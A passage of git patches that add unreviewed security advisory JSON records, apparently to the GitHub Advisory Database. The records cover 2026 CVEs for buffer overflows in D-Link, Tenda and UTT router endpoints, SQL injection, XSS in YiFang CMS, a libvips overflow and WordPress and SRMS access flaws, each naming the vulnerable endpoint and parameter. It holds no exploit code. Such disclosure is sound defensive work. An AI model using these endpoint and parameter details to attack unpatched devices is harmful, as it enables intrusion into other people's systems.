"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2926" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/21" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347273" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347273" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754498" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T05:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-mmwr-f26g-hp2q/GHSA-mmwr-f26g-hp2q.json b/advisories/unreviewed/2026/02/GHSA-mmwr-f26g-hp2q/GHSA-mmwr-f26g-hp2q.json new file mode 100644 index 0000000000000..260d8b3e8f042 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-mmwr-f26g-hp2q/GHSA-mmwr-f26g-hp2q.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mmwr-f26g-hp2q", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-2928" + ], + "details": "A vulnerability was found in D-Link DWR-M960 1.01.07. This issue affects the function sub_452CCC of the file /boafrm/formWlEncrypt of the component WLAN Encryption Configuration Endpoint. The manipulation of the argument submit-url results in stack-based buffer overflow. The attack may be launched remotely. The exploit has been made public and could be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2928" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/23" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347275" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347275" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754500" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T05:16:19Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json b/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json new file mode 100644 index 0000000000000..d54576b1272d0 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pp46-7w92-4xvf/GHSA-pp46-7w92-4xvf.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pp46-7w92-4xvf", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-2912" + ], + "details": "A vulnerability was found in code-projects Online Reviewer System 1.0. Impacted is an unknown function of the file /system/system/students/assessments/results/studentresult-view.php. The manipulation of the argument test_id results in sql injection. It is possible to launch the attack remotely. The exploit has been made public and could be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2912" + }, + { + "type": "WEB", + "url": "https://github.com/tiancesec/CVE/issues/25" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347221" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347221" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755219" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T04:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qf2x-h525-fc86/GHSA-qf2x-h525-fc86.json b/advisories/unreviewed/2026/02/GHSA-qf2x-h525-fc86/GHSA-qf2x-h525-fc86.json new file mode 100644 index 0000000000000..4f872e4d5694e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qf2x-h525-fc86/GHSA-qf2x-h525-fc86.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qf2x-h525-fc86", + "modified": "2026-02-22T06:30:16Z", + "published": "2026-02-22T06:30:16Z", + "aliases": [ + "CVE-2026-2911" + ], + "details": "A vulnerability has been found in Tenda FH451 up to 1.0.0.9. This issue affects some unknown processing of the file /goform/GstDhcpSetSer. The manipulation leads to buffer overflow. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2911" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347220" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347220" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755218" + }, + { + "type": "WEB", + "url": "https://vuln.ricky.place/Tenda/FH451" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T04:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-qjwf-h778-47mm/GHSA-qjwf-h778-47mm.json b/advisories/unreviewed/2026/02/GHSA-qjwf-h778-47mm/GHSA-qjwf-h778-47mm.json new file mode 100644 index 0000000000000..b05d3ba2857fa --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-qjwf-h778-47mm/GHSA-qjwf-h778-47mm.json @@ -0,0 +1,68 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qjwf-h778-47mm", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-2913" + ], + "details": "A vulnerability was determined in libvips up to 8.19.0. The affected element is the function vips_source_read_to_memory of the file libvips/iofuncs/source.c. This manipulation causes heap-based buffer overflow. It is possible to launch the attack on the local host. The attack's complexity is rated as high. The exploitability is described as difficult. The exploit has been publicly disclosed and may be utilized. Patch name: a56feecbe9ed66521d9647ec9fbcd2546eccd7ee. Applying a patch is the recommended action to fix this issue. The confirmation of the bugfix mentions: \"[T]he impact of this is negligible, since this only affects custom seekable sources larger than 4 GiB (and the crash occurs in user code rather than libvips itself).\"", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2913" + }, + { + "type": "WEB", + "url": "https://github.com/libvips/libvips/issues/4857" + }, + { + "type": "WEB", + "url": "https://github.com/libvips/libvips/issues/4857#issue-3920154326" + }, + { + "type": "WEB", + "url": "https://github.com/libvips/libvips/issues/4857#issuecomment-3878479322" + }, + { + "type": "WEB", + "url": "https://github.com/libvips/libvips/commit/a56feecbe9ed66521d9647ec9fbcd2546eccd7ee" + }, + { + "type": "WEB", + "url": "https://github.com/libvips/libvips" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347222" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347222" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755224" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T04:15:59Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-v4fw-f854-rf72/GHSA-v4fw-f854-rf72.json b/advisories/unreviewed/2026/02/GHSA-v4fw-f854-rf72/GHSA-v4fw-f854-rf72.json new file mode 100644 index 0000000000000..4586864ee1ae4 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-v4fw-f854-rf72/GHSA-v4fw-f854-rf72.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v4fw-f854-rf72", + "modified": "2026-02-22T06:30:17Z", + "published": "2026-02-22T06:30:17Z", + "aliases": [ + "CVE-2026-2925" + ], + "details": "A vulnerability was detected in D-Link DWR-M960 1.01.07. Affected by this issue is the function sub_42B5A0 of the file /boafrm/formBridgeVlan of the component Bridge VLAN Configuration Endpoint. Performing a manipulation of the argument submit-url results in stack-based buffer overflow. The attack can be initiated remotely. The exploit is now public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2925" + }, + { + "type": "WEB", + "url": "https://github.com/LX-66-LX/cve-new/issues/20" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347272" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347272" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.754497" + }, + { + "type": "WEB", + "url": "https://www.dlink.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T04:16:00Z" + } +} \ No newline at end of file From 55528546676022d2a99d27364fa0d6a25a39eb87 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 22 Feb 2026 09:32:04 +0000 Subject: [PATCH 43/77] Publish Advisories GHSA-3jg4-mfj9-3m8j GHSA-786c-jm2j-j6xw GHSA-7mmp-vchm-mm2p GHSA-9cqv-87fq-8fjx GHSA-c5fm-9xmx-m8v3 GHSA-f5hx-m48w-jh25 GHSA-rm9x-gmj8-vfxh --- .../GHSA-3jg4-mfj9-3m8j.json | 52 ++++++++++++++++ .../GHSA-786c-jm2j-j6xw.json | 52 ++++++++++++++++ .../GHSA-7mmp-vchm-mm2p.json | 40 +++++++++++++ .../GHSA-9cqv-87fq-8fjx.json | 52 ++++++++++++++++ .../GHSA-c5fm-9xmx-m8v3.json | 56 +++++++++++++++++ .../GHSA-f5hx-m48w-jh25.json | 56 +++++++++++++++++ .../GHSA-rm9x-gmj8-vfxh.json | 60 +++++++++++++++++++ 7 files changed, 368 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-3jg4-mfj9-3m8j/GHSA-3jg4-mfj9-3m8j.json create mode 100644 advisories/unreviewed/2026/02/GHSA-786c-jm2j-j6xw/GHSA-786c-jm2j-j6xw.json create mode 100644 advisories/unreviewed/2026/02/GHSA-7mmp-vchm-mm2p/GHSA-7mmp-vchm-mm2p.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9cqv-87fq-8fjx/GHSA-9cqv-87fq-8fjx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-c5fm-9xmx-m8v3/GHSA-c5fm-9xmx-m8v3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-f5hx-m48w-jh25/GHSA-f5hx-m48w-jh25.json create mode 100644 advisories/unreviewed/2026/02/GHSA-rm9x-gmj8-vfxh/GHSA-rm9x-gmj8-vfxh.json diff --git a/advisories/unreviewed/2026/02/GHSA-3jg4-mfj9-3m8j/GHSA-3jg4-mfj9-3m8j.json b/advisories/unreviewed/2026/02/GHSA-3jg4-mfj9-3m8j/GHSA-3jg4-mfj9-3m8j.json new file mode 100644 index 0000000000000..9aa8fe01a30ef --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-3jg4-mfj9-3m8j/GHSA-3jg4-mfj9-3m8j.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3jg4-mfj9-3m8j", + "modified": "2026-02-22T09:30:26Z", + "published": "2026-02-22T09:30:26Z", + "aliases": [ + "CVE-2026-2933" + ], + "details": "A weakness has been identified in YiFang CMS up to 2.0.5. This affects the function update of the file app/db/admin/D_adManage.php of the component Extended Management Module. Executing a manipulation of the argument Name can lead to cross site scripting. The attack may be performed from remote. The exploit has been made available to the public and could be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2933" + }, + { + "type": "WEB", + "url": "https://github.com/ZZCTD/CVE/issues/4" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347279" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347279" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755295" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T08:15:56Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-786c-jm2j-j6xw/GHSA-786c-jm2j-j6xw.json b/advisories/unreviewed/2026/02/GHSA-786c-jm2j-j6xw/GHSA-786c-jm2j-j6xw.json new file mode 100644 index 0000000000000..6f90c27cc67e1 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-786c-jm2j-j6xw/GHSA-786c-jm2j-j6xw.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-786c-jm2j-j6xw", + "modified": "2026-02-22T09:30:26Z", + "published": "2026-02-22T09:30:26Z", + "aliases": [ + "CVE-2026-2934" + ], + "details": "A security vulnerability has been detected in YiFang CMS up to 2.0.5. This impacts the function update of the file app/db/admin/D_friendLinkGroup.php of the component Extended Management Module. The manipulation of the argument Name leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed publicly and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2934" + }, + { + "type": "WEB", + "url": "https://github.com/ZZCTD/CVE/issues/5" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347280" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347280" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755296" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T09:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-7mmp-vchm-mm2p/GHSA-7mmp-vchm-mm2p.json b/advisories/unreviewed/2026/02/GHSA-7mmp-vchm-mm2p/GHSA-7mmp-vchm-mm2p.json new file mode 100644 index 0000000000000..3ba0a30a3063e --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-7mmp-vchm-mm2p/GHSA-7mmp-vchm-mm2p.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7mmp-vchm-mm2p", + "modified": "2026-02-22T09:30:26Z", + "published": "2026-02-22T09:30:26Z", + "aliases": [ + "CVE-2026-2385" + ], + "details": "The The Plus Addons for Elementor – Addons for Elementor, Page Templates, Widgets, Mega Menu, WooCommerce plugin for WordPress is vulnerable to Insufficient Verification of Data Authenticity in all versions up to, and including, 6.4.7. This is due to the plugin decrypting and trusting attacker-controlled email_data in an unauthenticated AJAX handler without cryptographic authenticity guarantees. This makes it possible for unauthenticated attackers to tamper with form email routing and redirection values to trigger unauthorized email relay and attacker-controlled redirection via the 'email_data' parameter.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2385" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3463156/the-plus-addons-for-elementor-page-builder" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9176535c-8e37-4a18-b458-a71c4a84daa4?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-345" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T09:16:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-9cqv-87fq-8fjx/GHSA-9cqv-87fq-8fjx.json b/advisories/unreviewed/2026/02/GHSA-9cqv-87fq-8fjx/GHSA-9cqv-87fq-8fjx.json new file mode 100644 index 0000000000000..8d5fe8e089164 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-9cqv-87fq-8fjx/GHSA-9cqv-87fq-8fjx.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9cqv-87fq-8fjx", + "modified": "2026-02-22T09:30:26Z", + "published": "2026-02-22T09:30:26Z", + "aliases": [ + "CVE-2026-2935" + ], + "details": "A weakness has been identified in UTT HiPER 810G up to 1.7.7-171114. This issue affects the function strcpy of the file /goform/ConfigExceptMSN. Executing a manipulation of the argument remark can lead to buffer overflow. The attack can be executed remotely. The exploit has been made available to the public and could be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2935" + }, + { + "type": "WEB", + "url": "https://github.com/alc9700jmo/CVE/issues/23" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347297" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347297" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755297" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T09:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-c5fm-9xmx-m8v3/GHSA-c5fm-9xmx-m8v3.json b/advisories/unreviewed/2026/02/GHSA-c5fm-9xmx-m8v3/GHSA-c5fm-9xmx-m8v3.json new file mode 100644 index 0000000000000..b9f53c43c56df --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-c5fm-9xmx-m8v3/GHSA-c5fm-9xmx-m8v3.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c5fm-9xmx-m8v3", + "modified": "2026-02-22T09:30:26Z", + "published": "2026-02-22T09:30:26Z", + "aliases": [ + "CVE-2026-2930" + ], + "details": "A vulnerability was identified in Tenda A18 15.13.07.13. The affected element is the function webCgiGetUploadFile of the file /cgi-bin/UploadCfg of the component Httpd Service. Such manipulation of the argument boundary leads to stack-based buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2930" + }, + { + "type": "WEB", + "url": "https://github.com/master-abc/cve/issues/40" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347277" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347277" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755227" + }, + { + "type": "WEB", + "url": "https://www.tenda.com.cn" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-119" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T07:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-f5hx-m48w-jh25/GHSA-f5hx-m48w-jh25.json b/advisories/unreviewed/2026/02/GHSA-f5hx-m48w-jh25/GHSA-f5hx-m48w-jh25.json new file mode 100644 index 0000000000000..d6aa584d98987 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-f5hx-m48w-jh25/GHSA-f5hx-m48w-jh25.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-f5hx-m48w-jh25", + "modified": "2026-02-22T09:30:26Z", + "published": "2026-02-22T09:30:26Z", + "aliases": [ + "CVE-2026-2938" + ], + "details": "A vulnerability has been found in SourceCodester Student Result Management System 1.0. The affected element is an unknown function of the file /srms/script/admin/core/update_smtp.php. The manipulation leads to improper access controls. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2938" + }, + { + "type": "WEB", + "url": "https://github.com/Shaon-Xis/SRMS-1.0---Unauthenticated-SMTP-Hijacking-to-Account-Takeover" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347310" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347310" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755345" + }, + { + "type": "WEB", + "url": "https://www.sourcecodester.com" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-266" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T09:16:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-rm9x-gmj8-vfxh/GHSA-rm9x-gmj8-vfxh.json b/advisories/unreviewed/2026/02/GHSA-rm9x-gmj8-vfxh/GHSA-rm9x-gmj8-vfxh.json new file mode 100644 index 0000000000000..e70e23ced3756 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-rm9x-gmj8-vfxh/GHSA-rm9x-gmj8-vfxh.json @@ -0,0 +1,60 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-rm9x-gmj8-vfxh", + "modified": "2026-02-22T09:30:26Z", + "published": "2026-02-22T09:30:26Z", + "aliases": [ + "CVE-2026-2932" + ], + "details": "A security flaw has been discovered in YiFang CMS up to 2.0.5. The impacted element is the function update of the file app/db/admin/D_adPosition.php of the component Extended Management Module. Performing a manipulation of the argument name/index results in cross site scripting. The attack is possible to be carried out remotely. The exploit has been released to the public and may be used for attacks.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2932" + }, + { + "type": "WEB", + "url": "https://github.com/ZZCTD/CVE/issues/2" + }, + { + "type": "WEB", + "url": "https://github.com/ZZCTD/CVE/issues/3" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.347278" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.347278" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755281" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.755286" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-22T08:15:55Z" + } +} \ No newline at end of file From 2ab36c6826f802e30ac315a3a2d42dfd17b762a0 Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Sun, 22 Feb 2026 12:32:04 +0000 Subject: [PATCH 44/77] Publish Advisories GHSA-7p2j-mg94-f4j6 GHSA-cv79-qfjv-wpvr GHSA-qqmj-6rm4-v4q6 GHSA-wh45-rv58-w5rc --- .../GHSA-7p2j-mg94-f4j6.json | 60 +++++++++++++++++++ .../GHSA-cv79-qfjv-wpvr.json | 60 +++++++++++++++++++ .../GHSA-qqmj-6rm4-v4q6.json | 52 ++++++++++++++++ .../GHSA-wh45-rv58-w5rc.json | 52 ++++++++++++++++ 4 files changed, 224 insertions(+) create mode 100644 